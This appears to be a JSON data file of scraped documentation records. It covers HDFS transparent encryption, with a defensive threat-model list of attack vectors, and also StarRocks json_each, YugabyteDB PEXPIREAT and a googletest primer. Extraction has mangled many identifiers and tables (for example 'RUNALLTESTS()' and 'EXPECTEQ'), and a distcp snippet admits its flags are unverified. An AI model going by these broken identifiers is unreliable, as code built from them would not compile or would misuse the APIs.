(e.g. when data is travelling over the network). Background Encryption can be done at different layers in a traditional data management software/hardware stack. Choosing to encrypt at a given layer comes with different advantages and disadvantages. Application-level encryption*. This is the most secure and most flexible approach. The application has ultimate control over what is encrypted and can precisely reflect the requirements of the user. However, writing applications to do this is hard. This is also not an option for customers of existing applications that do not support encryption. Database-level encryption*. Similar to application-level encryption in terms of its properties. Most database vendors offer some form of encryption. However, there can be performance issues. One example is that indexes cannot be encrypted. Filesystem-level encryption*. This option offers high performance, application transparency, and is typically easy to deploy. However, it is unable to model some application-level policies. For instance, multi-tenant applications might want to encrypt based on the end user. A database might want different encryption settings for each column stored within a single file. Disk-level encryption*. Easy to deploy and high performance, but also quite inflexible. Only really protects against physical theft. HDFS-level encryption fits between database-level and filesystem-level encryption in this stack. This has a lot of positive effects. HDFS encryption is able to provide good performance and existing Hadoop applications are able to run transparently on encrypted data. HDFS also has more context than traditional filesystems when it comes to making policy decisions. HDFS-level encryption also prevents attacks at the filesystem-level and below (so-called \"OS-level attacks\"). The operating system and disk only interact with encrypted bytes, since the data is already encrypted by HDFS. Use Cases Data encryption is required by a number of different government, financial, and regulatory entities. For example, the health-care industry has HIPAA regulations, the card payment industry has PCI DSS regulations, and the US government has FISMA regulations. 
Having transparent encryption built into HDFS makes it easier for organizations to comply with these" }, { "data": "Encryption can also be performed at the application-level, but by integrating it into HDFS, existing applications can operate on encrypted data without changes. This integrated architecture implies stronger encrypted file semantics and better coordination with other HDFS functions. Architecture For transparent encryption, we introduce a new abstraction to HDFS: the encryption zone. An encryption zone is a special directory whose contents will be transparently encrypted upon write and transparently decrypted upon read. Each encryption zone is associated with a single encryption zone key which is specified when the zone is created. Each file within an encryption zone has its own unique data encryption key (DEK). DEKs are never handled directly by HDFS. Instead, HDFS only ever handles an encrypted data encryption key (EDEK). Clients decrypt an EDEK, and then use the subsequent DEK to read and write data. HDFS datanodes simply see a stream of encrypted bytes. A very important use case of encryption is to \"switch it on\" and ensure all files across the entire filesystem are encrypted. To support this strong guarantee without losing the flexibility of using different encryption zone keys in different parts of the filesystem, HDFS allows nested encryption zones. After an encryption zone is created (e.g. on the root directory `/`), a user can create more encryption zones on its descendant directories (e.g. `/home/alice`) with different keys. The EDEK of a file will be generated using the encryption zone key from the closest ancestor encryption zone. A new cluster service is required to manage encryption keys: the Hadoop Key Management Server (KMS). In the context of HDFS encryption, the KMS performs three basic responsibilities: Providing access to stored encryption zone keys Generating new encrypted data encryption keys for storage on the NameNode Decrypting encrypted data encryption keys for use by HDFS clients The KMS will be described in more detail below. When creating a new file in an encryption zone, the NameNode asks the KMS to generate a new EDEK encrypted with the encryption zone's key. The EDEK is then stored persistently as part of the file's metadata on the NameNode. When reading a file within an encryption zone, the NameNode provides the client with the file's EDEK and the encryption zone key version used to encrypt the EDEK. The client then asks the KMS to decrypt the EDEK, which involves checking that the client has permission to access the encryption zone key version. Assuming that is successful, the client uses the DEK to decrypt the file's contents. All of the above steps for the read and write path happen automatically through interactions between the DFSClient, the NameNode, and the KMS. Access to encrypted file data and metadata is controlled by normal HDFS filesystem permissions. This means that if HDFS is compromised (for example, by gaining unauthorized access to an HDFS superuser account), a malicious user only gains access to ciphertext and encrypted keys. However, since access to encryption zone keys is controlled by a separate set of permissions on the KMS and key store, this does not pose a security" }, { "data": "The KMS is a proxy that interfaces with a backing key store on behalf of HDFS daemons and clients. Both the backing key store and the KMS implement the Hadoop KeyProvider API. See the for more information. 
In the KeyProvider API, each encryption key has a unique key name. Because keys can be rolled, a key can have multiple key versions, where each key version has its own key material (the actual secret bytes used during encryption and decryption). An encryption key can be fetched by either its key name, returning the latest version of the key, or by a specific key version. The KMS implements additional functionality which enables creation and decryption of encrypted encryption keys (EEKs). Creation and decryption of EEKs happens entirely on the KMS. Importantly, the client requesting creation or decryption of an EEK never handles the EEK's encryption key. To create a new EEK, the KMS generates a new random key, encrypts it with the specified key, and returns the EEK to the client. To decrypt an EEK, the KMS checks that the user has access to the encryption key, uses it to decrypt the EEK, and returns the decrypted encryption key. In the context of HDFS encryption, EEKs are encrypted data encryption keys (EDEKs), where a data encryption key (DEK) is what is used to encrypt and decrypt file data. Typically, the key store is configured to only allow end users access to the keys used to encrypt DEKs. This means that EDEKs can be safely stored and handled by HDFS, since the HDFS user will not have access to unencrypted encryption keys. Configuration A necessary prerequisite is an instance of the KMS, as well as a backing key store for the KMS. See the for more information. Once a KMS has been set up and the NameNode and HDFS clients have been correctly configured, an admin can use the `hadoop key` and `hdfs crypto` command-line tools to create encryption keys and set up new encryption zones. Existing data can be encrypted by copying it into the new encryption zones using tools like distcp. The KeyProvider to use when interacting with encryption keys used when reading and writing to an encryption zone. HDFS clients will use the provider path returned from Namenode via getServerDefaults. If namenode doesn't support returning key provider uri then client's conf will be used. The prefix for a given crypto codec, contains a comma-separated list of implementation classes for a given crypto codec (eg EXAMPLECIPHERSUITE). The first implementation will be used if available, others are fallbacks. Default: `org.apache.hadoop.crypto.OpensslAesCtrCryptoCodec, org.apache.hadoop.crypto.JceAesCtrCryptoCodec` Comma-separated list of crypto codec implementations for AES/CTR/NoPadding. The first implementation will be used if available, others are fallbacks. Default: `org.apache.hadoop.crypto.OpensslSm4CtrCryptoCodec, org.apache.hadoop.crypto.JceSm4CtrCryptoCodec` Comma-separated list of crypto codec implementations for SM4/CTR/NoPadding. The first implementation will be used if available, others are fallbacks. Default: `AES/CTR/NoPadding` Cipher suite for crypto codec, now AES/CTR/NoPadding and SM4/CTR/NoPadding are supported. Default: None The JCE provider name used in CryptoCodec. Default: `8192` The buffer size used by CryptoInputStream and" }, { "data": "Default: `100` When listing encryption zones, the maximum number of zones that will be returned in a batch. Fetching the list incrementally in batches improves namenode performance. `crypto` command-line interface Usage: `[-createZone -keyName <keyName> -path <path>]` Create a new encryption zone. | | | |:- |:- | | path | The path of the encryption zone to create. It must be an empty directory. 
A trash directory is provisioned under this path.| | keyName | Name of the key to use for the encryption zone. Uppercase key names are unsupported. | Usage: `[-listZones]` List all encryption zones. Requires superuser permissions. Usage: `[-provisionTrash -path <path>]` Provision a trash directory for an encryption zone. | | | |:- |:- | | path | The path to the root of the encryption zone. | Usage: `[-getFileEncryptionInfo -path <path>]` Get encryption information from a file. This can be used to find out whether a file is being encrypted, and the key name / key version used to encrypt it. | | | |:- |:- | | path | The path of the file to get encryption information. | Usage: `[-reencryptZone <action> -path <zone>]` Re-encrypts an encryption zone, by iterating through the encryption zone, and calling the KeyProvider's reencryptEncryptedKeys interface to batch-re-encrypt all files' EDEKs with the latest version encryption zone key in the key provider. Requires superuser permissions. Note that re-encryption does not apply to snapshots, due to snapshots' immutable nature. | | | |:- |:- | | action | The re-encrypt action to perform. Must be either `-start` or `-cancel`. | | path | The path to the root of the encryption zone. | Re-encryption is a NameNode-only operation in HDFS, so could potentially put intensive load to the NameNode. The following configurations can be changed to control the stress on the NameNode, depending on the acceptable throughput impact to the cluster. | | | |:- |:- | | dfs.namenode.reencrypt.batch.size | The number of EDEKs in a batch to be sent to the KMS for re-encryption. Each batch is processed when holding the name system read/write lock, with throttling happening between batches. See configs below. | | dfs.namenode.reencrypt.throttle.limit.handler.ratio | Ratio of read locks to be held during re-encryption. 1.0 means no throttling. 0.5 means re-encryption can hold the readlock at most 50% of its total processing time. Negative value or 0 are invalid. | | dfs.namenode.reencrypt.throttle.limit.updater.ratio | Ratio of write locks to be held during re-encryption. 1.0 means no throttling. 0.5 means re-encryption can hold the writelock at most 50% of its total processing time. Negative value or 0 are invalid. | Usage: `[-listReencryptionStatus]` List re-encryption information for all encryption zones. Requires superuser permissions. Example usage These instructions assume that you are running as the normal user or HDFS superuser as is appropriate. Use `sudo` as needed for your environment. hadoop key create mykey hadoop fs -mkdir /zone hdfs crypto -createZone -keyName mykey -path /zone hadoop fs -chown myuser:myuser /zone hadoop fs -put helloWorld /zone hadoop fs -cat /zone/helloWorld hdfs crypto -getFileEncryptionInfo -path /zone/helloWorld Distcp considerations One common usecase for distcp is to replicate data between clusters for backup and disaster recovery" }, { "data": "This is typically performed by the cluster administrator, who is an HDFS superuser. To enable this same workflow when using HDFS encryption, we introduced a new virtual path prefix, `/.reserved/raw/`, that gives superusers direct access to the underlying block data in the filesystem. This allows superusers to distcp data without needing having access to encryption keys, and also avoids the overhead of decrypting and re-encrypting data. It also means the source and destination data will be byte-for-byte identical, which would not be true if the data was being re-encrypted with a new EDEK. 
When using `/.reserved/raw` to distcp encrypted data, it's important to preserve extended attributes with the flag. This is because encrypted file attributes (such as the EDEK) are exposed through extended attributes within `/.reserved/raw`, and must be preserved to be able to decrypt the file. This means that if the distcp is initiated at or above the encryption zone root, it will automatically create an encryption zone at the destination if it does not already exist. However, it's still recommended that the admin first create identical encryption zones on the destination cluster to avoid any potential mishaps. By default, distcp compares checksums provided by the filesystem to verify that the data was successfully copied to the destination. When copying from unencrypted or encrypted location into an encrypted location, the filesystem checksums will not match since the underlying block data is different because a new EDEK will be used to encrypt at destination. In this case, specify the and distcp flags to avoid verifying checksums. Rename and Trash considerations HDFS restricts file and directory renames across encryption zone boundaries. This includes renaming an encrypted file / directory into an unencrypted directory (e.g., `hdfs dfs mv /zone/encryptedFile /home/bob`), renaming an unencrypted file or directory into an encryption zone (e.g., `hdfs dfs mv /home/bob/unEncryptedFile /zone`), and renaming between two different encryption zones (e.g., `hdfs dfs mv /home/alice/zone1/foo /home/alice/zone2`). In these examples, `/zone`, `/home/alice/zone1`, and `/home/alice/zone2` are encryption zones, while `/home/bob` is not. A rename is only allowed if the source and destination paths are in the same encryption zone, or both paths are unencrypted (not in any encryption zone). This restriction enhances security and eases system management significantly. All file EDEKs under an encryption zone are encrypted with the encryption zone key. Therefore, if the encryption zone key is compromised, it is important to identify all vulnerable files and re-encrypt them. This is fundamentally difficult if a file initially created in an encryption zone can be renamed to an arbitrary location in the filesystem. To comply with the above rule, each encryption zone has its own `.Trash` directory under the \"zone directory\". E.g., after `hdfs dfs rm /zone/encryptedFile`, `encryptedFile` will be moved to `/zone/.Trash`, instead of the `.Trash` directory under the user's home directory. When the entire encryption zone is deleted, the \"zone directory\" will be moved to the `.Trash` directory under the user's home directory. If the encryption zone is the root directory (e.g., `/` directory), the trash path of root directory is `/.Trash`, not the" }, { "data": "directory under the user's home directory, and the behavior of renaming sub-directories or sub-files in root directory will keep consistent with the behavior in a general encryption zone, such as `/zone` which is mentioned at the top of this section. The `crypto` command before Hadoop 2.8.0 does not provision the `.Trash` directory automatically. If an encryption zone is created before Hadoop 2.8.0, and then the cluster is upgraded to Hadoop 2.8.0 or above, the trash directory can be provisioned using `-provisionTrash` option (e.g., `hdfs crypto -provisionTrash -path /zone`). Attack vectors -- These exploits assume that attacker has gained physical access to hard drives from cluster machines, i.e. datanodes and namenodes. 
Access to swap files of processes containing data encryption keys. By itself, this does not expose cleartext, as it also requires access to encrypted block files. This can be mitigated by disabling swap, using encrypted swap, or using mlock to prevent keys from being swapped out. Access to encrypted block files. By itself, this does not expose cleartext, as it also requires access to DEKs. These exploits assume that attacker has gained root shell access to cluster machines, i.e. datanodes and namenodes. Many of these exploits cannot be addressed in HDFS, since a malicious root user has access to the in-memory state of processes holding encryption keys and cleartext. For these exploits, the only mitigation technique is carefully restricting and monitoring root shell access. Access to encrypted block files. By itself, this does not expose cleartext, as it also requires access to encryption keys. Dump memory of client processes to obtain DEKs, delegation tokens, cleartext. No mitigation. Recording network traffic to sniff encryption keys and encrypted data in transit. By itself, insufficient to read cleartext without the EDEK encryption key. Dump memory of datanode process to obtain encrypted block data. By itself, insufficient to read cleartext without the DEK. Dump memory of namenode process to obtain encrypted data encryption keys. By itself, insufficient to read cleartext without the EDEK's encryption key and encrypted block files. These exploits assume that the attacker has compromised HDFS, but does not have root or `hdfs` user shell access. Access to encrypted block files. By itself, insufficient to read cleartext without the EDEK and EDEK encryption key. Access to encryption zone and encrypted file metadata (including encrypted data encryption keys), via -fetchImage. By itself, insufficient to read cleartext without EDEK encryption keys. A rogue user can collect keys of files they have access to, and use them later to decrypt the encrypted data of those files. As the user had access to those files, they already had access to the file contents. This can be mitigated through periodic key rolling policies. The command is usually required after key rolling, to make sure the EDEKs on existing files use the new version key. Manual steps to a complete key rolling and re-encryption are listed below. These instructions assume that you are running as the key admin or HDFS superuser as is appropriate. hadoop key roll exposedKey hdfs crypto -listZones hdfs crypto -reencryptZone -start -path /zone hdfs crypto -listReencryptionStatus hdfs crypto -getFileEncryptionInfo -path /zone/helloWorld" } ]
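The distcp flag names below are assumptions to verify against your Hadoop version — the text above deliberately leaves the exact options unspecified — but the pattern is the one described: preserve xattrs on raw copies, and skip checksum verification when the destination re-encrypts:

```bash
# Sketch only: replicate an encryption zone between clusters as raw bytes.
# -px preserves extended attributes, which carry the per-file EDEKs.
hadoop distcp -px -update \
  hdfs://src-nn:8020/.reserved/raw/zone \
  hdfs://dst-nn:8020/.reserved/raw/zone

# Sketch only: a non-raw copy into an encryption zone is re-encrypted with new
# EDEKs, so filesystem checksums differ and verification must be skipped.
hadoop distcp -update -skipcrccheck /data/in /zone/in
```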
{ "category": "App Definition and Development", "file_name": "json_each.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" Expands the outermost elements of a JSON object into a set of key-value pairs held in two columns and returns a table that consists of one row for each element. ```Haskell jsoneach(jsonobject_expr) ``` `jsonobjectexpr`: the expression that represents the JSON object. The object can be a JSON column, or a JSON object that is produced by a JSON constructor function such as PARSE_JSON. Returns two columns: one named key and one named value. The key column stores VARCHAR values, and the value column stores JSON values. The jsoneach function is a table function that returns a table. The returned table is a result set that consists of multiple rows. Therefore, a lateral join must be used in the FROM clause to join the returned table to the original table. The lateral join is mandatory, but the LATERAL keyword is optional. The jsoneach function cannot be used in the SELECT clause. ```plaintext -- A table named tj is used as an example. In the tj table, the j column is a JSON object. mysql> SELECT * FROM tj; +++ | id | j | +++ | 1 | {\"a\": 1, \"b\": 2} | | 3 | {\"a\": 3} | +++ -- Expand the j column of the tj table into two columns by key and value to obtain a result set that consists of multiple rows. In this example, the LATERAL keyword is used to join the result set to the tj table. mysql> SELECT * FROM tj, LATERAL json_each(j); ++++-+ | id | j | key | value | ++++-+ | 1 | {\"a\": 1, \"b\": 2} | a | 1 | | 1 | {\"a\": 1, \"b\": 2} | b | 2 | | 3 | {\"a\": 3} | a | 3 | ++++-+ ```" } ]
{ "category": "App Definition and Development", "file_name": "pexpireat.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: PEXPIREAT linkTitle: PEXPIREAT description: PEXPIREAT menu: preview: parent: api-yedis weight: 2234 aliases: /preview/api/redis/pexpireat /preview/api/yedis/pexpireat type: docs `PEXPIREAT key ttl-as-timestamp` PEXPIREAT has the same effect as EXPIREAT, but the Unix timestamp at which the key will expire is specified in milliseconds instead of seconds. Returns integer reply, specifically 1 if the timeout was set and 0 if key does not exist. ```sh $ SET yugakey \"Yugabyte\" ``` ``` \"OK\" ``` ```sh $ PEXPIREAT yugakey 1555555555005 ``` ``` (integer) 1 ``` ```sh $ PTTL yugakey ``` ``` (integer) 18674452994 ``` , , ," } ]
{ "category": "App Definition and Development", "file_name": "primer.md", "project_name": "VoltDB", "subcategory": "Database" }
[ { "data": "googletest helps you write better C++ tests. googletest is a testing framework developed by the Testing Technology team with Google's specific requirements and constraints in mind. No matter whether you work on Linux, Windows, or a Mac, if you write C++ code, googletest can help you. And it supports any kind of tests, not just unit tests. So what makes a good test, and how does googletest fit in? We believe: Tests should be independent and repeatable. It's a pain to debug a test that succeeds or fails as a result of other tests. googletest isolates the tests by running each of them on a different object. When a test fails, googletest allows you to run it in isolation for quick debugging. Tests should be well organized and reflect the structure of the tested code. googletest groups related tests into test cases that can share data and subroutines. This common pattern is easy to recognize and makes tests easy to maintain. Such consistency is especially helpful when people switch projects and start to work on a new code base. Tests should be portable and reusable. Google has a lot of code that is platform-neutral, its tests should also be platform-neutral. googletest works on different OSes, with different compilers (gcc, icc, and MSVC), with or without exceptions, so googletest tests can easily work with a variety of configurations. When tests fail, they should provide as much information about the problem as possible. googletest doesn't stop at the first test failure. Instead, it only stops the current test and continues with the next. You can also set up tests that report non-fatal failures after which the current test continues. Thus, you can detect and fix multiple bugs in a single run-edit-compile cycle. The testing framework should liberate test writers from housekeeping chores and let them focus on the test content. googletest automatically keeps track of all tests defined, and doesn't require the user to enumerate them in order to run them. Tests should be fast. With googletest, you can reuse shared resources across tests and pay for the set-up/tear-down only once, without making tests depend on each other. Since googletest is based on the popular xUnit architecture, you'll feel right at home if you've used JUnit or PyUnit before. If not, it will take you about 10 minutes to learn the basics and get started. So let's go! Note: There might be some confusion of idea due to different definitions of the terms Test, Test Case and Test Suite, so beware of misunderstanding these. Historically, googletest started to use the term Test Case for grouping related tests, whereas current publications including the International Software Testing Qualifications Board () and various textbooks on Software Quality use the term _[Test Suite](http://glossary.istqb.org/search/test%20suite)_ for this. The related term Test, as it is used in the googletest, is corresponding to the term of ISTQB and others. The term Test is commonly of broad enough sense, including ISTQB's definition of Test Case, so it's not much of a problem here. But the term Test Case as was used in Google Test is of contradictory sense and thus confusing. 
googletest recently started replacing the term Test Case by Test Suite The preferred API is" }, { "data": "The older TestCase API is being slowly deprecated and refactored away So please be aware of the different definitions of the terms: Meaning | googletest Term | Term :-- | : | :- Exercise a particular program path with specific input values and verify the results | | When using googletest, you start by writing assertions, which are statements that check whether a condition is true. An assertion's result can be success, nonfatal failure, or fatal failure. If a fatal failure occurs, it aborts the current function; otherwise the program continues normally. Tests use assertions to verify the tested code's behavior. If a test crashes or has a failed assertion, then it fails; otherwise it succeeds. A test case contains one or many tests. You should group your tests into test cases that reflect the structure of the tested code. When multiple tests in a test case need to share common objects and subroutines, you can put them into a test fixture class. A test program can contain multiple test cases. We'll now explain how to write a test program, starting at the individual assertion level and building up to tests and test cases. googletest assertions are macros that resemble function calls. You test a class or function by making assertions about its behavior. When an assertion fails, googletest prints the assertion's source file and line number location, along with a failure message. You may also supply a custom failure message which will be appended to googletest's message. The assertions come in pairs that test the same thing but have different effects on the current function. `ASSERT_*` versions generate fatal failures when they fail, and abort the current function. `EXPECT_*` versions generate nonfatal failures, which don't abort the current function. Usually `EXPECT_*` are preferred, as they allow more than one failure to be reported in a test. However, you should use `ASSERT_*` if it doesn't make sense to continue when the assertion in question fails. Since a failed `ASSERT_*` returns from the current function immediately, possibly skipping clean-up code that comes after it, it may cause a space leak. Depending on the nature of the leak, it may or may not be worth fixing - so keep this in mind if you get a heap checker error in addition to assertion errors. To provide a custom failure message, simply stream it into the macro using the `<<` operator, or a sequence of such operators. An example: ```c++ ASSERT_EQ(x.size(), y.size()) << \"Vectors x and y are of unequal length\"; for (int i = 0; i < x.size(); ++i) { EXPECT_EQ(x[i], y[i]) << \"Vectors x and y differ at index \" << i; } ``` Anything that can be streamed to an `ostream` can be streamed to an assertion macro--in particular, C strings and `string` objects. If a wide string (`wchar_t`, `TCHAR` in `UNICODE` mode on Windows, or `std::wstring`) is streamed to an assertion, it will be translated to UTF-8 when printed. These assertions do basic true/false condition testing. Fatal assertion | Nonfatal assertion | Verifies -- | -- | -- `ASSERTTRUE(condition);` | `EXPECTTRUE(condition);` | `condition` is true `ASSERTFALSE(condition);` | `EXPECTFALSE(condition);` | `condition` is false Remember, when they fail, `ASSERT_*` yields a fatal failure and returns from the current function, while `EXPECT_*` yields a nonfatal failure, allowing the function to continue running. In either case, an assertion failure means its containing test fails. 
Availability: Linux, Windows, Mac. This section describes assertions that compare two" }, { "data": "Fatal assertion | Nonfatal assertion | Verifies | | -- `ASSERTEQ(val1, val2);` | `EXPECTEQ(val1, val2);` | `val1 == val2` `ASSERTNE(val1, val2);` | `EXPECTNE(val1, val2);` | `val1 != val2` `ASSERTLT(val1, val2);` | `EXPECTLT(val1, val2);` | `val1 < val2` `ASSERTLE(val1, val2);` | `EXPECTLE(val1, val2);` | `val1 <= val2` `ASSERTGT(val1, val2);` | `EXPECTGT(val1, val2);` | `val1 > val2` `ASSERTGE(val1, val2);` | `EXPECTGE(val1, val2);` | `val1 >= val2` Value arguments must be comparable by the assertion's comparison operator or you'll get a compiler error. We used to require the arguments to support the `<<` operator for streaming to an `ostream`, but it's no longer necessary. If `<<` is supported, it will be called to print the arguments when the assertion fails; otherwise googletest will attempt to print them in the best way it can. For more details and how to customize the printing of the arguments, see gMock .). These assertions can work with a user-defined type, but only if you define the corresponding comparison operator (e.g. `==`, `<`, etc). Since this is discouraged by the Google [C++ Style Guide](https://google.github.io/styleguide/cppguide.html#Operator_Overloading), you may need to use `ASSERTTRUE()` or `EXPECTTRUE()` to assert the equality of two objects of a user-defined type. However, when possible, `ASSERT_EQ(actual, expected)` is preferred to `ASSERT_TRUE(actual == expected)`, since it tells you `actual` and `expected`'s values on failure. Arguments are always evaluated exactly once. Therefore, it's OK for the arguments to have side effects. However, as with any ordinary C/C++ function, the arguments' evaluation order is undefined (i.e. the compiler is free to choose any order) and your code should not depend on any particular argument evaluation order. `ASSERT_EQ()` does pointer equality on pointers. If used on two C strings, it tests if they are in the same memory location, not if they have the same value. Therefore, if you want to compare C strings (e.g. `const char*`) by value, use `ASSERT_STREQ()`, which will be described later on. In particular, to assert that a C string is `NULL`, use `ASSERTSTREQ(cstring, NULL)`. Consider using `ASSERTEQ(cstring, nullptr)` if c++11 is supported. To compare two `string` objects, you should use `ASSERT_EQ`. When doing pointer comparisons use `_EQ(ptr, nullptr)` and `_NE(ptr, nullptr)` instead of `_EQ(ptr, NULL)` and `_NE(ptr, NULL)`. This is because `nullptr` is typed while `NULL` is not. See for more details. If you're working with floating point numbers, you may want to use the floating point variations of some of these macros in order to avoid problems caused by rounding. See for details. Macros in this section work with both narrow and wide string objects (`string` and `wstring`). Availability: Linux, Windows, Mac. Historical note: Before February 2016 `*_EQ` had a convention of calling it as `ASSERT_EQ(expected, actual)`, so lots of existing code uses this order. Now `*_EQ` treats both parameters in the same way. The assertions in this group compare two C strings. 
If you want to compare two `string` objects, use `EXPECTEQ`, `EXPECTNE`, and etc" }, { "data": "| Fatal assertion | Nonfatal assertion | Verifies | | - | - | -- | | `ASSERTSTREQ(str1, str2);` | `EXPECTSTREQ(str1, str2);` | the two C strings have the same content | | `ASSERTSTRNE(str1, str2);` | `EXPECTSTRNE(str1, str2);` | the two C strings have different contents | | `ASSERTSTRCASEEQ(str1, str2);` | `EXPECTSTRCASEEQ(str1, str2);` | the two C strings have the same content, ignoring case | | `ASSERTSTRCASENE(str1, str2);` | `EXPECTSTRCASENE(str1, str2);` | the two C strings have different contents, ignoring case | Note that \"CASE\" in an assertion name means that case is ignored. A `NULL` pointer and an empty string are considered different. `STREQ` and `STRNE` also accept wide C strings (`wchar_t*`). If a comparison of two wide strings fails, their values will be printed as UTF-8 narrow strings. Availability: Linux, Windows, Mac. See also: For more string comparison tricks (substring, prefix, suffix, and regular expression matching, for example), see in the Advanced googletest Guide. To create a test: Use the `TEST()` macro to define and name a test function, These are ordinary C++ functions that don't return a value. In this function, along with any valid C++ statements you want to include, use the various googletest assertions to check values. The test's result is determined by the assertions; if any assertion in the test fails (either fatally or non-fatally), or if the test crashes, the entire test fails. Otherwise, it succeeds. ```c++ TEST(TestSuiteName, TestName) { ... test body ... } ``` `TEST()` arguments go from general to specific. The first argument is the name of the test case, and the second argument is the test's name within the test case. Both names must be valid C++ identifiers, and they should not contain underscore (`_`). A test's full name consists of its containing test case and its individual name. Tests from different test cases can have the same individual name. For example, let's take a simple integer function: ```c++ int Factorial(int n); // Returns the factorial of n ``` A test case for this function might look like: ```c++ // Tests factorial of 0. TEST(FactorialTest, HandlesZeroInput) { EXPECT_EQ(Factorial(0), 1); } // Tests factorial of positive numbers. TEST(FactorialTest, HandlesPositiveInput) { EXPECT_EQ(Factorial(1), 1); EXPECT_EQ(Factorial(2), 2); EXPECT_EQ(Factorial(3), 6); EXPECT_EQ(Factorial(8), 40320); } ``` googletest groups the test results by test cases, so logically-related tests should be in the same test case; in other words, the first argument to their `TEST()` should be the same. In the above example, we have two tests, `HandlesZeroInput` and `HandlesPositiveInput`, that belong to the same test case `FactorialTest`. When naming your test cases and tests, you should follow the same convention as for [naming functions and classes](https://google.github.io/styleguide/cppguide.html#Function_Names). Availability: Linux, Windows, Mac. If you find yourself writing two or more tests that operate on similar data, you can use a test fixture. It allows you to reuse the same configuration of objects for several different tests. To create a fixture: Derive a class from `::testing::Test` . Start its body with `protected:` as we'll want to access fixture members from sub-classes. Inside the class, declare any objects you plan to use. If necessary, write a default constructor or `SetUp()` function to prepare the objects for each test. 
A common mistake is to spell `SetUp()` as `Setup()` with a small `u` - Use `override` in C++11 to make sure you spelled it correctly If necessary, write a destructor or `TearDown()` function to release any resources you allocated in `SetUp()` . To learn when you should use the constructor/destructor and when you should use `SetUp()/TearDown()`, read this entry. If needed, define subroutines for your tests to share. When using a fixture, use `TEST_F()` instead of `TEST()` as it allows you to access objects and subroutines in the test fixture: ```c++ TEST_F(TestSuiteName, TestName) { ... test body" }, { "data": "} ``` Like `TEST()`, the first argument is the test case name, but for `TEST_F()` this must be the name of the test fixture class. You've probably guessed: `_F` is for fixture. Unfortunately, the C++ macro system does not allow us to create a single macro that can handle both types of tests. Using the wrong macro causes a compiler error. Also, you must first define a test fixture class before using it in a `TEST_F()`, or you'll get the compiler error \"`virtual outside class declaration`\". For each test defined with `TEST_F()` , googletest will create a fresh test fixture at runtime, immediately initialize it via `SetUp()` , run the test, clean up by calling `TearDown()` , and then delete the test fixture. Note that different tests in the same test case have different test fixture objects, and googletest always deletes a test fixture before it creates the next one. googletest does not reuse the same test fixture for multiple tests. Any changes one test makes to the fixture do not affect other tests. As an example, let's write tests for a FIFO queue class named `Queue`, which has the following interface: ```c++ template <typename E> // E is the element type. class Queue { public: Queue(); void Enqueue(const E& element); E* Dequeue(); // Returns NULL if the queue is empty. size_t size() const; ... }; ``` First, define a fixture class. By convention, you should give it the name `FooTest` where `Foo` is the class being tested. ```c++ class QueueTest : public ::testing::Test { protected: void SetUp() override { q1_.Enqueue(1); q2_.Enqueue(2); q2_.Enqueue(3); } // void TearDown() override {} Queue<int> q0_; Queue<int> q1_; Queue<int> q2_; }; ``` In this case, `TearDown()` is not needed since we don't have to clean up after each test, other than what's already done by the destructor. Now we'll write tests using `TEST_F()` and this fixture. ```c++ TEST_F(QueueTest, IsEmptyInitially) { EXPECTEQ(q0.size(), 0); } TEST_F(QueueTest, DequeueWorks) { int* n = q0_.Dequeue(); EXPECT_EQ(n, nullptr); n = q1_.Dequeue(); ASSERT_NE(n, nullptr); EXPECT_EQ(*n, 1); EXPECTEQ(q1.size(), 0); delete n; n = q2_.Dequeue(); ASSERT_NE(n, nullptr); EXPECT_EQ(*n, 2); EXPECTEQ(q2.size(), 1); delete n; } ``` The above uses both `ASSERT*` and `EXPECT*` assertions. The rule of thumb is to use `EXPECT_*` when you want the test to continue to reveal more errors after the assertion failure, and use `ASSERT_*` when continuing after failure doesn't make sense. For example, the second assertion in the `Dequeue` test is =ASSERT_NE(nullptr, n)=, as we need to dereference the pointer `n` later, which would lead to a segfault when `n` is `NULL`. When these tests run, the following happens: googletest constructs a `QueueTest` object (let's call it `t1` ). `t1.SetUp()` initializes `t1` . The first test ( `IsEmptyInitially` ) runs on `t1` . `t1.TearDown()` cleans up after the test finishes. `t1` is destructed. 
The above steps are repeated on another `QueueTest` object, this time running the `DequeueWorks` test. Availability: Linux, Windows, Mac. `TEST()` and `TEST_F()` implicitly register their tests with googletest. So, unlike with many other C++ testing frameworks, you don't have to re-list all your defined tests in order to run them. After defining your tests, you can run them with `RUNALLTESTS()` , which returns `0` if all the tests are successful, or `1` otherwise. Note that `RUNALLTESTS()` runs all tests in your link unit -- they can be from different test cases, or even different source" }, { "data": "When invoked, the `RUNALLTESTS()` macro: Saves the state of all googletest flags Creates a test fixture object for the first test. Initializes it via `SetUp()`. Runs the test on the fixture object. Cleans up the fixture via `TearDown()`. Deletes the fixture. Restores the state of all googletest flags Repeats the above steps for the next test, until all tests have run. If a fatal failure happens the subsequent steps will be skipped. IMPORTANT: You must not ignore the return value of `RUNALLTESTS()`, or you will get a compiler error. The rationale for this design is that the automated testing service determines whether a test has passed based on its exit code, not on its stdout/stderr output; thus your `main()` function must return the value of `RUNALLTESTS()`. Also, you should call `RUNALLTESTS()` only once. Calling it more than once conflicts with some advanced googletest features (e.g. thread-safe [death tests](advanced.md#death-tests)) and thus is not supported. Availability: Linux, Windows, Mac. Write your own main() function, which should return the value of `RUNALLTESTS()` ```c++ namespace { // The fixture for testing class Foo. class FooTest : public ::testing::Test { protected: // You can remove any or all of the following functions if its body // is empty. FooTest() { // You can do set-up work for each test here. } ~FooTest() override { // You can do clean-up work that doesn't throw exceptions here. } // If the constructor and destructor are not enough for setting up // and cleaning up each test, you can define the following methods: void SetUp() override { // Code here will be called immediately after the constructor (right // before each test). } void TearDown() override { // Code here will be called immediately after each test (right // before the destructor). } // Objects declared here can be used by all tests in the test case for Foo. }; // Tests that the Foo::Bar() method does Abc. TEST_F(FooTest, MethodBarDoesAbc) { const std::string input_filepath = \"this/package/testdata/myinputfile.dat\"; const std::string output_filepath = \"this/package/testdata/myoutputfile.dat\"; Foo f; EXPECTEQ(f.Bar(inputfilepath, output_filepath), 0); } // Tests that Foo does Xyz. TEST_F(FooTest, DoesXyz) { // Exercises the Xyz feature of Foo. } } // namespace int main(int argc, char argv) { ::testing::InitGoogleTest(&argc, argv); return RUNALLTESTS(); } ``` The `::testing::InitGoogleTest()` function parses the command line for googletest flags, and removes all recognized flags. This allows the user to control a test program's behavior via various flags, which we'll cover in . You must call this function before calling `RUNALLTESTS()`, or the flags won't be properly initialized. On Windows, `InitGoogleTest()` also works with wide strings, so it can be used in programs compiled in 